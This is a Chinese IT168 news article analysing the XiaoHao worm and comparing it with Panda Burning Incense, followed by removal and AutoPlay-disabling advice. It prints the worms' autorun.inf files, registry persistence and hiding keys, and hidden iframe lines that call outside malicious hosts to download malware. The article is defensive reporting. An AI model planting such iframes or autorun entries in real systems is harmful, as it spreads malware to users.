【IT168  资讯】网络病毒风波是一波未平一波又起，就在“熊猫烧香”与“AV终结者”风潮刚过不久，又一款蠕虫病毒“小浩”（Worm/XiaoHao.a），再次在网络中逞强。两种病毒都是以感染EXE可执行程序为手段，并且通过网络及第三方存储设备传播，其发作形式也几近类似。

    “小浩”（Worm/XiaoHao.a）病毒简介
    由于该病毒采用的是覆盖式写入，被“小浩”病毒感染破坏后的EXE文件将无法修复，并且该病毒母进程还会创建iexplore.exe 子进程，利用多个系统漏洞下载木马病毒，肆意破坏计算机安全，而且系统被感染后，将自动修改时间为2005年1月17日或是1987年，使一些杀毒软件的使用授权失效，如果遇上不能被关闭的杀软，病毒将会尝试模拟鼠标操作，绕过杀毒软件的主动防御功能，比“熊猫烧香”在某种意义上讲更难对付。
    病毒名称：Worm/XiaoHao.a
    中 文 名：小浩蠕虫
    病毒类型：蠕虫
    危害等级：★★★★
    影响平台：Win 9X/ME/NT/2000/XP/2003

    病毒运行原理
    “小浩” 蠕虫病毒是由Visual C++6.0 工具编写而成，经过UPX工具加壳处理生成程序隐匿性。病毒在感染运行后，将在被感染计算机中的每个硬盘根目录下释放两个病毒文件：第一、字节长度为402706字节的c:\xiaohao.exe可执行文件；第二、外配一个自启动文件其字节长度为91字节，生成c:\autorun.inf，以达利用计算机在启动时，自动查找根目录下的inf文件，以达自动运行的目的，其inf文件内容如下：
    [Autorun]
    open=Xiaohao.exe
    shellexecute=Xiaohao.exe
    shell\Auto\command=Xiaohao.exe
    当“小浩”病毒驻扎进入系统平台后，会自动搜索硬盘中扩展名为exe 的文件，并将自身病毒体写入其中，形成独具特色的“浩”字图标感染式，（注：此点与“熊猫烧香”病毒感染所造成的图标原理一样）。病毒在用户在毫不知情的情况下，利用系统平台的自动播放功能借助第三方存储设备进行传播。

    同时“小浩”病毒还会搜索硬盘中扩展名为：htm、html、asp、aspx、jsp、php等网页文件，并在其中插入<iframe src=http://xiaohao.yona.biz/***.htm width=0 height=0></iframe>一段代码，以达用户在打开正常页面时，被转向到恶意链接页面并利用系统漏洞下载执行病毒源体。当用户浏览被“小浩”病毒感染的文件窗口时，该窗口标题栏出现已中毒 X14o-H4o's Virus 的字样。

    最后“小浩”蠕虫病毒会将系统平台中未被感染的文件属性设置成隐藏，并破坏注册表相关键值，使其不能显示隐藏文件，随即生成一个c:\Jilu.txt病毒日志文件，记录被感染的文件和被隐藏的文件，其破坏严重影响了电脑的正常使用。

    对比“熊猫烧香”
    与“小浩”病毒相比，“熊猫烧香”的危害狂潮在短短的两个月里，就将数百万台电脑感染在代码中，那只憨态可掬、颔首敬香的“熊猫”图片除而不尽，令人望而生畏。此时仍不得而知“小浩”病毒是否会出新变种，在感染危害上能否能超过猫风时期，而两者之间又有着什么样的联系呢？下面看下“熊猫烧香”的病毒行为特征：

    首先病毒会复制自身到系统目录%System%\drivers\下，生成病毒文件，（生成不同的目录变种文件如其下的：spoclsv.exe、System32\Drivers下的spoclsv.exe等）；随会后在注册表　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]中创建启动项如："svcshare"="%System%\drivers\spoclsv.exe"，并且生成硬盘各分区根目录文件setup.exe和autorun.inf文件，autorun.inf内容为：
    [AutoRun]
    OPEN=setup.exe
    shellexecute=setup.exe
    shell\Auto\command=setup.exe
    使其病毒文件在各盘自动加载运行，并且使用net share命令关闭管理共享，然后再次通过修改注册表[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]键值下的"CheckedValue"=dword:00000000隐藏文件属性，病毒运行后会搜索并尝试关闭计算机中安装的各种安全软件，并尝试结束相关进程，禁用安全软件相关服务并删除相关启动项。如遇局域网环境，病毒会尝试使用弱密码，将副本命名为GameSetup.exe文件，进行复制传播。

    最后“熊猫烧香”病毒也会搜索硬盘中扩展名为：htm、html、asp、aspx、jsp、php等网页文件，并文件尾部追加语句<iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>，指定网页，下载自身等各式木马病毒。随后病毒会查找系统中的GHO文件，将其强行删除，以防用户使用镜像恢复系统。

    以上两种病毒发作及感染形态读者一看便明，近期流行的“小浩”病毒在自动搜索网址插入代码，感染文件后的隐匿属性及更改个性图标，都显出了继“熊猫烧香”之后的新型病毒正在漫延。这里敬告用户在网络中畅游时，一定要小心为上！

    病毒预防及杀法
    对于“熊猫烧香”的清除方法这里不在重述了，请参见网址：http://publish.it168.com/2007/0517/20070517002201.shtml、http://publish.it168.com/2007/0130/20070130040601.shtml及http://publish.it168.com/2007/0131/20070131002301.shtml即可。

    关于“小浩”病毒的杀法江民科技提出：所有江民杀软用户只要将病毒库更新到8月14日，并利用Windows Update 功能为系统平台打上最新补丁，即可实现对病毒的拦截禁止入侵，总体解决步骤为：首先设定杀毒软件的升级时间、定时杀毒并开启软件中的所有监控功能（包含网页监控，防止病毒从网页中以木马的形式侵入），随后禁用自动播放功能（方法为：在开始菜单的运行项中输入gpedit.msc，打开组策略-本地计算机策略-计算机配置-管理模板，在系统下选择设置勾选启用关闭自动播放，并在其关闭自动播放框中选择所有驱动器，确定退出即可），这样即可防止病毒从第三方存诸设备中利用自动播放功能带入。

    后记：据消息称，目前一些病毒编写者还会将病毒源代码公开在互联网中，并留下联系方式，以期技术上的交流指正。其实熊猫烧香、AV终结者、小浩病毒的相继产生，虽然将互联网安全的天空蒙上了一层阴影，但同时也标志着新一代的防毒体系即将到来，其间的关系是相辅相成的，病毒在发展的同时也推进了反病毒技术的进步。